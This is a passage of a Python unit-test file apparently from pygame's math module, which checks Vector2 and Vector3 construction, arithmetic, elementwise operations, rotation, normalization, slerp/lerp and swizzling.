self.assertEqual(v2.elementwise() >= v1.elementwise(), v2.x >= v1.x and v2.y >= v1.y)
self.assertEqual(v2.elementwise() == v1.elementwise(), v2.x == v1.x and v2.y == v1.y)
self.assertEqual(v2.elementwise() != v1.elementwise(), v2.x != v1.x and v2.y != v1.y)
# other behaviour
self.assertEqual(abs(v1.elementwise()), (abs(v1.x), abs(v1.y)))
self.assertEqual(-v1.elementwise(), -v1)
self.assertEqual(+v1.elementwise(), +v1)
self.assertEqual(bool(v1.elementwise()), bool(v1))
self.assertEqual(bool(Vector2().elementwise()), bool(Vector2()))
self.assertEqual(self.zeroVec.elementwise() ** 0, (1, 1))
self.assertRaises(ValueError, lambda : pow(Vector2(-1, 0).elementwise(), 1.2))
self.assertRaises(ZeroDivisionError, lambda : self.zeroVec.elementwise() ** -1)
self.assertRaises(ZeroDivisionError, lambda : self.zeroVec.elementwise() ** -1)
self.assertRaises(ZeroDivisionError, lambda : Vector2(1,1).elementwise() / 0)
self.assertRaises(ZeroDivisionError, lambda : Vector2(1,1).elementwise() // 0)
self.assertRaises(ZeroDivisionError, lambda : Vector2(1,1).elementwise() % 0)
self.assertRaises(ZeroDivisionError, lambda : Vector2(1,1).elementwise() / self.zeroVec)
self.assertRaises(ZeroDivisionError, lambda : Vector2(1,1).elementwise() // self.zeroVec)
self.assertRaises(ZeroDivisionError, lambda : Vector2(1,1).elementwise() % self.zeroVec)
self.assertRaises(ZeroDivisionError, lambda : 2 / self.zeroVec.elementwise())
self.assertRaises(ZeroDivisionError, lambda : 2 // self.zeroVec.elementwise())
self.assertRaises(ZeroDivisionError, lambda : 2 % self.zeroVec.elementwise())
def test_slerp(self):
self.assertRaises(ValueError, lambda : self.zeroVec.slerp(self.v1, .5))
self.assertRaises(ValueError, lambda : self.v1.slerp(self.zeroVec, .5))
self.assertRaises(ValueError,
lambda : self.zeroVec.slerp(self.zeroVec, .5))
v1 = Vector2(1, 0)
v2 = Vector2(0, 1)
steps = 10
angle_step = v1.angle_to(v2) / steps
for i, u in ((i, v1.slerp(v2, i/float(steps))) for i in range(steps+1)):
self.assertAlmostEqual(u.length(), 1)
self.assertAlmostEqual(v1.angle_to(u), i * angle_step)
self.assertEqual(u, v2)
v1 = Vector2(100, 0)
v2 = Vector2(0, 10)
radial_factor = v2.length() / v1.length()
for i, u in ((i, v1.slerp(v2, -i/float(steps))) for i in range(steps+1)):
self.assertAlmostEqual(u.length(), (v2.length() - v1.length()) * (float(i)/steps) + v1.length())
self.assertEqual(u, v2)
self.assertEqual(v1.slerp(v1, .5), v1)
self.assertEqual(v2.slerp(v2, .5), v2)
self.assertRaises(ValueError, lambda : v1.slerp(-v1, 0.5))
def test_lerp(self):
v1 = Vector2(0, 0)
v2 = Vector2(10, 10)
self.assertEqual(v1.lerp(v2, 0.5), (5, 5))
self.assertRaises(ValueError, lambda : v1.lerp(v2, 2.5))
v1 = Vector2(-10, -5)
v2 = Vector2(10, 10)
self.assertEqual(v1.lerp(v2, 0.5), (0, 2.5))
def test_polar(self):
v = Vector2()
v.from_polar(self.v1.as_polar())
self.assertEqual(self.v1, v)
self.assertEqual(self.e1.as_polar(), (1, 0))
self.assertEqual(self.e2.as_polar(), (1, 90))
self.assertEqual((2 * self.e2).as_polar(), (2, 90))
self.assertRaises(TypeError, lambda : v.from_polar((None, None)))
self.assertRaises(TypeError, lambda : v.from_polar("ab"))
self.assertRaises(TypeError, lambda : v.from_polar((None, 1)))
self.assertRaises(TypeError, lambda : v.from_polar((1, 2, 3)))
self.assertRaises(TypeError, lambda : v.from_polar((1,)))
self.assertRaises(TypeError, lambda : v.from_polar(1, 2))
v.from_polar((.5, 90))
self.assertEqual(v, .5 * self.e2)
v.from_polar((1, 0))
self.assertEqual(v, self.e1)
def test_subclass_operation(self):
class Vector(pygame.math.Vector2):
pass
vec = Vector()
vec_a = Vector(2, 0)
vec_b = Vector(0, 1)
vec_a + vec_b
vec_a *= 2
class Vector3TypeTest(unittest.TestCase):
def setUp(self):
self.zeroVec = Vector3()
self.e1 = Vector3(1, 0, 0)
self.e2 = Vector3(0, 1, 0)
self.e3 = Vector3(0, 0, 1)
self.t1 = (1.2, 3.4, 9.6)
self.l1 = list(self.t1)
self.v1 = Vector3(self.t1)
self.t2 = (5.6, 7.8, 2.1)
self.l2 = list(self.t2)
self.v2 = Vector3(self.t2)
self.s1 = 5.6
self.s2 = 7.8
def testConstructionDefault(self):
v = Vector3()
self.assertEqual(v.x, 0.)
self.assertEqual(v.y, 0.)
self.assertEqual(v.z, 0.)
def testConstructionXYZ(self):
v = Vector3(1.2, 3.4, 9.6)
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
self.assertEqual(v.z, 9.6)
def testConstructionTuple(self):
v = Vector3((1.2, 3.4, 9.6))
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
self.assertEqual(v.z, 9.6)
def testConstructionList(self):
v = Vector3([1.2, 3.4, -9.6])
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
self.assertEqual(v.z, -9.6)
def testConstructionVector3(self):
v = Vector3(Vector3(1.2, 3.4, -9.6))
self.assertEqual(v.x, 1.2)
self.assertEqual(v.y, 3.4)
self.assertEqual(v.z, -9.6)
def testConstructionScalar(self):
v = Vector3(1)
self.assertEqual(v.x, 1.)
self.assertEqual(v.y, 1.)
self.assertEqual(v.z, 1.)
def testConstructionScalarKeywords(self):
v = Vector3(x=1)
self.assertEqual(v.x, 1.)
self.assertEqual(v.y, 1.)
self.assertEqual(v.z, 1.)
def testConstructionKeywords(self):
v = Vector3(x=1, y=2, z=3)
self.assertEqual(v.x, 1.)
self.assertEqual(v.y, 2.)
self.assertEqual(v.z, 3.)
def testConstructionMissing(self):
def assign_missing_value():
v = Vector3(1, 2)
self.assertRaises(ValueError, assign_missing_value)
def assign_missing_value():
v = Vector3(x=1, y=2)
self.assertRaises(ValueError, assign_missing_value)
def testAttributAccess(self):
tmp = self.v1.x
self.assertEqual(tmp, self.v1.x)
self.assertEqual(tmp, self.v1[0])
tmp = self.v1.y
self.assertEqual(tmp, self.v1.y)
self.assertEqual(tmp, self.v1[1])
tmp = self.v1.z
self.assertEqual(tmp, self.v1.z)
self.assertEqual(tmp, self.v1[2])
self.v1.x = 3.141
self.assertEqual(self.v1.x, 3.141)
self.v1.y = 3.141
self.assertEqual(self.v1.y, 3.141)
self.v1.z = 3.141
self.assertEqual(self.v1.z, 3.141)
def assign_nonfloat():
v = Vector2()
v.x = "spam"
self.assertRaises(TypeError, assign_nonfloat)
def testSequence(self):
v = Vector3(1.2, 3.4, -9.6)
self.assertEqual(len(v), 3)
self.assertEqual(v[0], 1.2)
self.assertEqual(v[1], 3.4)
self.assertEqual(v[2], -9.6)
self.assertRaises(IndexError, lambda : v[3])
self.assertEqual(v[-1], -9.6)
self.assertEqual(v[-2], 3.4)
self.assertEqual(v[-3], 1.2)
self.assertRaises(IndexError, lambda : v[-4])
self.assertEqual(v[:], [1.2, 3.4, -9.6])
self.assertEqual(v[1:], [3.4, -9.6])
self.assertEqual(v[:1], [1.2])
self.assertEqual(v[:-1], [1.2, 3.4])
self.assertEqual(v[1:2], [3.4])
self.assertEqual(list(v), [1.2, 3.4, -9.6])
self.assertEqual(tuple(v), (1.2, 3.4, -9.6))
v[0] = 5.6
v[1] = 7.8
v[2] = -2.1
self.assertEqual(v.x, 5.6)
self.assertEqual(v.y, 7.8)
self.assertEqual(v.z, -2.1)
v[:] = [9.1, 11.12, -13.41]
self.assertEqual(v.x, 9.1)
self.assertEqual(v.y, 11.12)
self.assertEqual(v.z, -13.41)
def overpopulate():
v = Vector3()
v[:] = [1, 2, 3, 4]
self.assertRaises(ValueError, overpopulate)
def underpopulate():
v = Vector3()
v[:] = [1]
self.assertRaises(ValueError, underpopulate)
def assign_nonfloat():
v = Vector2()
v[0] = "spam"
self.assertRaises(TypeError, assign_nonfloat)
def testExtendedSlicing(self):
# deletion
def delSlice(vec, start=None, stop=None, step=None):
if start is not None and stop is not None and step is not None:
del vec[start:stop:step]
elif start is not None and stop is None and step is not None:
del vec[start::step]
elif start is None and stop is None and step is not None:
del vec[::step]
v = Vector3(self.v1)
self.assertRaises(TypeError, delSlice, v, None, None, 2)
self.assertRaises(TypeError, delSlice, v, 1, None, 2)
self.assertRaises(TypeError, delSlice, v, 1, 2, 1)
# assignment
v = Vector3(self.v1)
v[::2] = [-1.1, -2.2]
self.assertEqual(v, [-1.1, self.v1.y, -2.2])
v = Vector3(self.v1)
v[::-2] = [10, 20]
self.assertEqual(v, [20, self.v1.y, 10])
v = Vector3(self.v1)
v[::-1] = v
self.assertEqual(v, [self.v1.z, self.v1.y, self.v1.x])
a = Vector3(self.v1)
b = Vector3(self.v1)
c = Vector3(self.v1)
a[1:2] = [2.2]
b[slice(1,2)] = [2.2]
c[1:2:] = (2.2,)
self.assertEqual(a, b)
self.assertEqual(a, c)
self.assertEqual(type(a), type(self.v1))
self.assertEqual(type(b), type(self.v1))
self.assertEqual(type(c), type(self.v1))
def testAdd(self):
v3 = self.v1 + self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x + self.v2.x)
self.assertEqual(v3.y, self.v1.y + self.v2.y)
self.assertEqual(v3.z, self.v1.z + self.v2.z)
v3 = self.v1 + self.t2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x + self.t2[0])
self.assertEqual(v3.y, self.v1.y + self.t2[1])
self.assertEqual(v3.z, self.v1.z + self.t2[2])
v3 = self.v1 + self.l2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x + self.l2[0])
self.assertEqual(v3.y, self.v1.y + self.l2[1])
self.assertEqual(v3.z, self.v1.z + self.l2[2])
v3 = self.t1 + self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.t1[0] + self.v2.x)
self.assertEqual(v3.y, self.t1[1] + self.v2.y)
self.assertEqual(v3.z, self.t1[2] + self.v2.z)
v3 = self.l1 + self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.l1[0] + self.v2.x)
self.assertEqual(v3.y, self.l1[1] + self.v2.y)
self.assertEqual(v3.z, self.l1[2] + self.v2.z)
def testSub(self):
v3 = self.v1 - self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x - self.v2.x)
self.assertEqual(v3.y, self.v1.y - self.v2.y)
self.assertEqual(v3.z, self.v1.z - self.v2.z)
v3 = self.v1 - self.t2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x - self.t2[0])
self.assertEqual(v3.y, self.v1.y - self.t2[1])
self.assertEqual(v3.z, self.v1.z - self.t2[2])
v3 = self.v1 - self.l2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.v1.x - self.l2[0])
self.assertEqual(v3.y, self.v1.y - self.l2[1])
self.assertEqual(v3.z, self.v1.z - self.l2[2])
v3 = self.t1 - self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.t1[0] - self.v2.x)
self.assertEqual(v3.y, self.t1[1] - self.v2.y)
self.assertEqual(v3.z, self.t1[2] - self.v2.z)
v3 = self.l1 - self.v2
self.assertTrue(isinstance(v3, type(self.v1)))
self.assertEqual(v3.x, self.l1[0] - self.v2.x)
self.assertEqual(v3.y, self.l1[1] - self.v2.y)
self.assertEqual(v3.z, self.l1[2] - self.v2.z)
def testScalarMultiplication(self):
v = self.s1 * self.v1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, self.s1 * self.v1.x)
self.assertEqual(v.y, self.s1 * self.v1.y)
self.assertEqual(v.z, self.s1 * self.v1.z)
v = self.v1 * self.s2
self.assertEqual(v.x, self.v1.x * self.s2)
self.assertEqual(v.y, self.v1.y * self.s2)
self.assertEqual(v.z, self.v1.z * self.s2)
def testScalarDivision(self):
v = self.v1 / self.s1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertAlmostEqual(v.x, self.v1.x / self.s1)
self.assertAlmostEqual(v.y, self.v1.y / self.s1)
self.assertAlmostEqual(v.z, self.v1.z / self.s1)
v = self.v1 // self.s2
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, self.v1.x // self.s2)
self.assertEqual(v.y, self.v1.y // self.s2)
self.assertEqual(v.z, self.v1.z // self.s2)
def testBool(self):
self.assertEqual(bool(self.zeroVec), False)
self.assertEqual(bool(self.v1), True)
self.assertTrue(not self.zeroVec)
self.assertTrue(self.v1)
def testUnary(self):
v = +self.v1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, self.v1.x)
self.assertEqual(v.y, self.v1.y)
self.assertEqual(v.z, self.v1.z)
self.assertNotEqual(id(v), id(self.v1))
v = -self.v1
self.assertTrue(isinstance(v, type(self.v1)))
self.assertEqual(v.x, -self.v1.x)
self.assertEqual(v.y, -self.v1.y)
self.assertEqual(v.z, -self.v1.z)
self.assertNotEqual(id(v), id(self.v1))
def testCompare(self):
int_vec = Vector3(3, -2, 13)
flt_vec = Vector3(3.0, -2.0, 13.)
zero_vec = Vector3(0, 0, 0)
self.assertEqual(int_vec == flt_vec, True)
self.assertEqual(int_vec != flt_vec, False)
self.assertEqual(int_vec != zero_vec, True)
self.assertEqual(flt_vec == zero_vec, False)
self.assertEqual(int_vec == (3, -2, 13), True)
self.assertEqual(int_vec != (3, -2, 13), False)
self.assertEqual(int_vec != [0, 0], True)
self.assertEqual(int_vec == [0, 0], False)
self.assertEqual(int_vec != 5, True)
self.assertEqual(int_vec == 5, False)
self.assertEqual(int_vec != [3, -2, 0, 1], True)
self.assertEqual(int_vec == [3, -2, 0, 1], False)
def testStr(self):
v = Vector3(1.2, 3.4, 5.6)
self.assertEqual(str(v), "[1.2, 3.4, 5.6]")
def testRepr(self):
v = Vector3(1.2, 3.4, -9.6)
self.assertEqual(v.__repr__(), "<Vector3(1.2, 3.4, -9.6)>")
self.assertEqual(v, Vector3(v.__repr__()))
def testIter(self):
it = self.v1.__iter__()
if PY3:
next_ = it.__next__
else:
next_ = it.next
self.assertEqual(next_(), self.v1[0])
self.assertEqual(next_(), self.v1[1])
self.assertEqual(next_(), self.v1[2])
self.assertRaises(StopIteration, lambda : next_())
it1 = self.v1.__iter__()
it2 = self.v1.__iter__()
self.assertNotEqual(id(it1), id(it2))
self.assertEqual(id(it1), id(it1.__iter__()))
self.assertEqual(list(it1), list(it2));
self.assertEqual(list(self.v1.__iter__()), self.l1)
idx = 0
for val in self.v1:
self.assertEqual(val, self.v1[idx])
idx += 1
def test_rotate(self):
v1 = Vector3(1, 0, 0)
axis = Vector3(0, 1, 0)
v2 = v1.rotate(90, axis)
v3 = v1.rotate(90 + 360, axis)
self.assertEqual(v1.x, 1)
self.assertEqual(v1.y, 0)
self.assertEqual(v1.z, 0)
self.assertEqual(v2.x, 0)
self.assertEqual(v2.y, 0)
self.assertEqual(v2.z, -1)
self.assertEqual(v3.x, v2.x)
self.assertEqual(v3.y, v2.y)
self.assertEqual(v3.z, v2.z)
v1 = Vector3(-1, -1, -1)
v2 = v1.rotate(-90, axis)
self.assertEqual(v2.x, 1)
self.assertEqual(v2.y, -1)
self.assertEqual(v2.z, -1)
v2 = v1.rotate(360, axis)
self.assertEqual(v1.x, v2.x)
self.assertEqual(v1.y, v2.y)
self.assertEqual(v1.z, v2.z)
v2 = v1.rotate(0, axis)
self.assertEqual(v1.x, v2.x)
self.assertEqual(v1.y, v2.y)
self.assertEqual(v1.z, v2.z)
# issue 214
self.assertEqual(Vector3(0, 1, 0).rotate(359.9999999, Vector3(0, 0, 1)),
Vector3(0, 1, 0))
def test_rotate_ip(self):
v = Vector3(1, 0, 0)
axis = Vector3(0, 1, 0)
self.assertEqual(v.rotate_ip(90, axis), None)
self.assertEqual(v.x, 0)
self.assertEqual(v.y, 0)
self.assertEqual(v.z, -1)
v = Vector3(-1, -1, 1)
v.rotate_ip(-90, axis)
self.assertEqual(v.x, -1)
self.assertEqual(v.y, -1)
self.assertEqual(v.z, -1)
def test_rotate_x(self):
v1 = Vector3(1, 0, 0)
v2 = v1.rotate_x(90)
v3 = v1.rotate_x(90 + 360)
self.assertEqual(v1.x, 1)
self.assertEqual(v1.y, 0)
self.assertEqual(v1.z, 0)
self.assertEqual(v2.x, 1)
self.assertEqual(v2.y, 0)
self.assertEqual(v2.z, 0)
self.assertEqual(v3.x, v2.x)
self.assertEqual(v3.y, v2.y)
self.assertEqual(v3.z, v2.z)
v1 = Vector3(-1, -1, -1)
v2 = v1.rotate_x(-90)
self.assertEqual(v2.x, -1)
self.assertAlmostEqual(v2.y, -1)
self.assertAlmostEqual(v2.z, 1)
v2 = v1.rotate_x(360)
self.assertAlmostEqual(v1.x, v2.x)
self.assertAlmostEqual(v1.y, v2.y)
self.assertAlmostEqual(v1.z, v2.z)
v2 = v1.rotate_x(0)
self.assertEqual(v1.x, v2.x)
self.assertAlmostEqual(v1.y, v2.y)
self.assertAlmostEqual(v1.z, v2.z)
def test_rotate_x_ip(self):
v = Vector3(1, 0, 0)
self.assertEqual(v.rotate_x_ip(90), None)
self.assertEqual(v.x, 1)
self.assertEqual(v.y, 0)
self.assertEqual(v.z, 0)
v = Vector3(-1, -1, 1)
v.rotate_x_ip(-90)
self.assertEqual(v.x, -1)
self.assertAlmostEqual(v.y, 1)
self.assertAlmostEqual(v.z, 1)
def test_rotate_y(self):
v1 = Vector3(1, 0, 0)
v2 = v1.rotate_y(90)
v3 = v1.rotate_y(90 + 360)
self.assertEqual(v1.x, 1)
self.assertEqual(v1.y, 0)
self.assertEqual(v1.z, 0)
self.assertAlmostEqual(v2.x, 0)
self.assertEqual(v2.y, 0)
self.assertAlmostEqual(v2.z, -1)
self.assertAlmostEqual(v3.x, v2.x)
self.assertEqual(v3.y, v2.y)
self.assertAlmostEqual(v3.z, v2.z)
v1 = Vector3(-1, -1, -1)
v2 = v1.rotate_y(-90)
self.assertAlmostEqual(v2.x, 1)
self.assertEqual(v2.y, -1)
self.assertAlmostEqual(v2.z, -1)
v2 = v1.rotate_y(360)
self.assertAlmostEqual(v1.x, v2.x)
self.assertEqual(v1.y, v2.y)
self.assertAlmostEqual(v1.z, v2.z)
v2 = v1.rotate_y(0)
self.assertEqual(v1.x, v2.x)
self.assertEqual(v1.y, v2.y)
self.assertEqual(v1.z, v2.z)
def test_rotate_y_ip(self):
v = Vector3(1, 0, 0)
self.assertEqual(v.rotate_y_ip(90), None)
self.assertAlmostEqual(v.x, 0)
self.assertEqual(v.y, 0)
self.assertAlmostEqual(v.z, -1)
v = Vector3(-1, -1, 1)
v.rotate_y_ip(-90)
self.assertAlmostEqual(v.x, -1)
self.assertEqual(v.y, -1)
self.assertAlmostEqual(v.z, -1)
def test_rotate_z(self):
v1 = Vector3(1, 0, 0)
v2 = v1.rotate_z(90)
v3 = v1.rotate_z(90 + 360)
self.assertEqual(v1.x, 1)
self.assertEqual(v1.y, 0)
self.assertEqual(v1.z, 0)
self.assertAlmostEqual(v2.x, 0)
self.assertAlmostEqual(v2.y, 1)
self.assertEqual(v2.z, 0)
self.assertAlmostEqual(v3.x, v2.x)
self.assertAlmostEqual(v3.y, v2.y)
self.assertEqual(v3.z, v2.z)
v1 = Vector3(-1, -1, -1)
v2 = v1.rotate_z(-90)
self.assertAlmostEqual(v2.x, -1)
self.assertAlmostEqual(v2.y, 1)
self.assertEqual(v2.z, -1)
v2 = v1.rotate_z(360)
self.assertAlmostEqual(v1.x, v2.x)
self.assertAlmostEqual(v1.y, v2.y)
self.assertEqual(v1.z, v2.z)
v2 = v1.rotate_z(0)
self.assertAlmostEqual(v1.x, v2.x)
self.assertAlmostEqual(v1.y, v2.y)
self.assertEqual(v1.z, v2.z)
def test_rotate_z_ip(self):
v = Vector3(1, 0, 0)
self.assertEqual(v.rotate_z_ip(90), None)
self.assertAlmostEqual(v.x, 0)
self.assertAlmostEqual(v.y, 1)
self.assertEqual(v.z, 0)
v = Vector3(-1, -1, 1)
v.rotate_z_ip(-90)
self.assertAlmostEqual(v.x, -1)
self.assertAlmostEqual(v.y, 1)
self.assertEqual(v.z, 1)
def test_normalize(self):
v = self.v1.normalize()
# length is 1
self.assertAlmostEqual(v.x * v.x + v.y * v.y + v.z * v.z, 1.)
# v1 is unchanged
self.assertEqual(self.v1.x, self.l1[0])
self.assertEqual(self.v1.y, self.l1[1])
self.assertEqual(self.v1.z, self.l1[2])
# v2 is paralell to v1 (tested via cross product)
cross = ((self.v1.y * v.z - self.v1.z * v.y) ** 2 +
(self.v1.z * v.x - self.v1.x * v.z) ** 2 +
(self.v1.x * v.y - self.v1.y * v.x) ** 2)
self.assertAlmostEqual(cross, 0.)
self.assertRaises(ValueError, lambda : self.zeroVec.normalize())
def test_normalize_ip(self):
v = +self.v1
# v has length != 1 before normalizing
self.assertNotEqual(v.x * v.x + v.y * v.y + v.z * v.z, 1.)
# inplace operations should return None
self.assertEqual(v.normalize_ip(), None)
# length is 1
self.assertAlmostEqual(v.x * v.x + v.y * v.y + v.z * v.z, 1.)
# v2 is paralell to v1 (tested via cross product)
cross = ((self.v1.y * v.z - self.v1.z * v.y) ** 2 +
(self.v1.z * v.x - self.v1.x * v.z) ** 2 +
(self.v1.x * v.y - self.v1.y * v.x) ** 2)
self.assertAlmostEqual(cross, 0.)
self.assertRaises(ValueError, lambda : self.zeroVec.normalize_ip())
def test_is_normalized(self):
self.assertEqual(self.v1.is_normalized(), False)
v = self.v1.normalize()
self.assertEqual(v.is_normalized(), True)
self.assertEqual(self.e2.is_normalized(), True)
self.assertEqual(self.zeroVec.is_normalized(), False)
def test_cross(self):
def cross(a, b):
return Vector3(a[1] * b[2] - a[2] * b[1],
a[2] * b[0] - a[0] * b[2],
a[0] * b[1] - a[1] * b[0])
self.assertEqual(self.v1.cross(self.v2), cross(self.v1, self.v2))
self.assertEqual(self.v1.cross(self.l2), cross(self.v1, self.l2))
self.assertEqual(self.v1.cross(self.t2), cross(self.v1, self.t2))
self.assertEqual(self.v1.cross(self.v2), -self.v2.cross(self.v1))
self.assertEqual(self.v1.cross(self.v1), self.zeroVec)
def test_dot(self):
self.assertAlmostEqual(self.v1.dot(self.v2),
self.v1.x * self.v2.x + self.v1.y * self.v2.y + self.v1.z * self.v2.z)
self.assertAlmostEqual(self.v1.dot(self.l2),
self.v1.x * self.l2[0] + self.v1.y * self.l2[1] + self.v1.z * self.l2[2])
self.assertAlmostEqual(self.v1.dot(self.t2),
self.v1.x * self.t2[0] + self.v1.y * self.t2[1] + self.v1.z * self.t2[2])
self.assertAlmostEqual(self.v1.dot(self.v2), self.v2.dot(self.v1))
self.assertAlmostEqual(self.v1.dot(self.v2), self.v1 * self.v2)
def test_angle_to(self):
self.assertEqual(Vector3(1, 1, 0).angle_to((-1, 1, 0)), 90)
self.assertEqual(Vector3(1, 0, 0).angle_to((0, 0, -1)), 90)
self.assertEqual(Vector3(1, 0, 0).angle_to((-1, 0, 1)), 135)
self.assertEqual(abs(Vector3(1, 0, 1).angle_to((-1, 0, -1))), 180)
# if we rotate v1 by the angle_to v2 around their cross product
# we should look in the same direction
self.assertEqual(self.v1.rotate(self.v1.angle_to(self.v2), self.v1.cross(self.v2)).normalize(),
self.v2.normalize())
def test_scale_to_length(self):
v = Vector3(1, 1, 1)
v.scale_to_length(2.5)
self.assertEqual(v, Vector3(2.5, 2.5, 2.5) / math.sqrt(3))
self.assertRaises(ValueError, lambda : self.zeroVec.scale_to_length(1))
self.assertEqual(v.scale_to_length(0), None)
self.assertEqual(v, self.zeroVec)
def test_length(self):
self.assertEqual(Vector3(3, 4, 5).length(), math.sqrt(3 * 3 + 4 * 4 + 5 * 5))
self.assertEqual(Vector3(-3, 4, 5).length(), math.sqrt(-3 * -3 + 4 * 4 + 5 * 5))
self.assertEqual(self.zeroVec.length(), 0)
def test_length_squared(self):
self.assertEqual(Vector3(3, 4, 5).length_squared(), 3 * 3 + 4 * 4 + 5 * 5)
self.assertEqual(Vector3(-3, 4, 5).length_squared(), -3 * -3 + 4 * 4 + 5 * 5)
self.assertEqual(self.zeroVec.length_squared(), 0)
def test_reflect(self):
v = Vector3(1, -1, 1)
n = Vector3(0, 1, 0)
self.assertEqual(v.reflect(n), Vector3(1, 1, 1))
self.assertEqual(v.reflect(3*n), v.reflect(n))
self.assertEqual(v.reflect(-v), -v)
self.assertRaises(ValueError, lambda : v.reflect(self.zeroVec))
def test_reflect_ip(self):
v1 = Vector3(1, -1, 1)
v2 = Vector3(v1)
n = Vector3(0, 1, 0)
self.assertEqual(v2.reflect_ip(n), None)
self.assertEqual(v2, Vector3(1, 1, 1))
v2 = Vector3(v1)
v2.reflect_ip(3*n)
self.assertEqual(v2, v1.reflect(n))
v2 = Vector3(v1)
v2.reflect_ip(-v1)
self.assertEqual(v2, -v1)
self.assertRaises(ValueError, lambda : v2.reflect_ip(self.zeroVec))
def test_distance_to(self):
diff = self.v1 - self.v2
self.assertEqual(self.e1.distance_to(self.e2), math.sqrt(2))
self.assertEqual(self.v1.distance_to(self.v2),
math.sqrt(diff.x * diff.x + diff.y * diff.y + diff.z * diff.z))
self.assertEqual(self.v1.distance_to(self.v1), 0)
self.assertEqual(self.v1.distance_to(self.v2),
self.v2.distance_to(self.v1))
def test_distance_squared_to(self):
diff = self.v1 - self.v2
self.assertEqual(self.e1.distance_squared_to(self.e2), 2)
self.assertAlmostEqual(self.v1.distance_squared_to(self.v2),
diff.x * diff.x + diff.y * diff.y + diff.z * diff.z)
self.assertEqual(self.v1.distance_squared_to(self.v1), 0)
self.assertEqual(self.v1.distance_squared_to(self.v2),
self.v2.distance_squared_to(self.v1))
def test_swizzle(self):
self.assertTrue(hasattr(pygame.math, "enable_swizzling"))
self.assertTrue(hasattr(pygame.math, "disable_swizzling"))
# swizzling enabled by default
pygame.math.disable_swizzling()
self.assertRaises(AttributeError, lambda : self.v1.yx)
pygame.math.enable_swizzling()
self.assertEqual(self.v1.yxz, (self.v1.y, self.v1.x, self.v1.z))
self.assertEqual(self.v1.xxyyzzxyz, (self.v1.x, self.v1.x, self.v1.y,
self.v1.y, self.v1.z, self.v1.z,
self.v1.x, self.v1.y, self.v1.z))
self.v1.xyz = self.t2
self.assertEqual(self.v1, self.t2)
self.v1.zxy = self.t2
self.assertEqual(self.v1, (self.t2[1], self.t2[2], self.t2[0]))
self.v1.yz = self.t2[:2]
self.assertEqual(self.v1, (self.t2[1], self.t2[0], self.t2[1]))
self.assertEqual(type(self.v1), Vector3)
@unittest.skipIf(IS_PYPY, "known pypy failure")
def test_invalid_swizzle(self):
def invalidSwizzleX():
Vector3().xx = (1, 2)
def invalidSwizzleY():
Vector3().yy = (1, 2)
def invalidSwizzleZ():
Vector3().zz = (1, 2)
def invalidSwizzleW():
Vector3().ww = (1, 2)
self.assertRaises(AttributeError, invalidSwizzleX)
self.assertRaises(AttributeError, invalidSwizzleY)
self.assertRaises(AttributeError, invalidSwizzleZ)
self.assertRaises(AttributeError, invalidSwizzleW)
def invalidAssignment():
Vector3().xy = 3
self.assertRaises(TypeError, invalidAssignment)
def test_swizzle_return_types(self):
self.assertEqual(type(self.v1.x), float)
self.assertEqual(type(self.v1.xy), Vector2)
self.assertEqual(type(self.v1.xyz), Vector3)
# but we don't have vector4 or above... so tuple.
self.assertEqual(type(self.v1.xyxy), tuple)
self.assertEqual(type(self.v1.xyxyx), tuple)
def test_dir_works(self):
# not every single one of the attributes...
attributes = set(['lerp', 'normalize', 'normalize_ip', 'reflect', 'slerp', 'x', 'y'])
# check if this selection of attributes are all there.
self.assertTrue(attributes.issubset(set(dir(self.v1))))
def test_elementwise(self):
# behaviour for "elementwise op scalar"
self.assertEqual(self.v1.elementwise() + self.s1,
(self.v1.x + self.s1, self.v1.y + self.s1, self.v1.z + self.s1))
self.assertEqual(self.v1.elementwise() - self.s1,
(self.v1.x - self.s1, self.v1.y - self.s1, self.v1.z - self.s1))
self.assertEqual(self.v1.elementwise() * self.s2,
(self.v1.x * self.s2, self.v1.y * self.s2, self.v1.z * self.s2))
self.assertEqual(self.v1.elementwise() / self.s2,
(self.v1.x / self.s2, self.v1.y / self.s2, self.v1.z / self.s2))
self.assertEqual(self.v1.elementwise() // self.s1,
(self.v1.x // self.s1, self.v1.y // self.s1, self.v1.z // self.s1))
self.assertEqual(self.v1.elementwise() ** self.s1,
(self.v1.x ** self.s1, self.v1.y ** self.s1, self.v1.z ** self.s1))
self.assertEqual(self.v1.elementwise() % self.s1,
(self.v1.x % self.s1, self.v1.y % self.s1, self.v1.z % self.s1))
self.assertEqual(self.v1.elementwise() > self.s1,
self.v1.x > self.s1 and self.v1.y > self.s1 and self.v1.z > self.s1)
self.assertEqual(self.v1.elementwise() < self.s1,
self.v1.x < self.s1 and self.v1.y < self.s1 and self.v1.z < self.s1)
self.assertEqual(self.v1.elementwise() == self.s1,
self.v1.x == self.s1 and self.v1.y == self.s1 and self.v1.z == self.s1)
self.assertEqual(self.v1.elementwise() != self.s1,
self.v1.x != self.s1 and self.v1.y != self.s1 and self.v1.z != self.s1)
self.assertEqual(self.v1.elementwise() >= self.s1,
self.v1.x >= self.s1 and self.v1.y >= self.s1 and self.v1.z >= self.s1)
self.assertEqual(self.v1.elementwise() <= self.s1,
self.v1.x <= self.s1 and self.v1.y <= self.s1 and self.v1.z <= self.s1)
# behaviour for "scalar op elementwise"
self.assertEqual(5 + self.v1.elementwise(), Vector3(5, 5, 5) + self.v1)
self.assertEqual(3.5 - self.v1.elementwise(), Vector3(3.5, 3.5, 3.5) - self.v1)
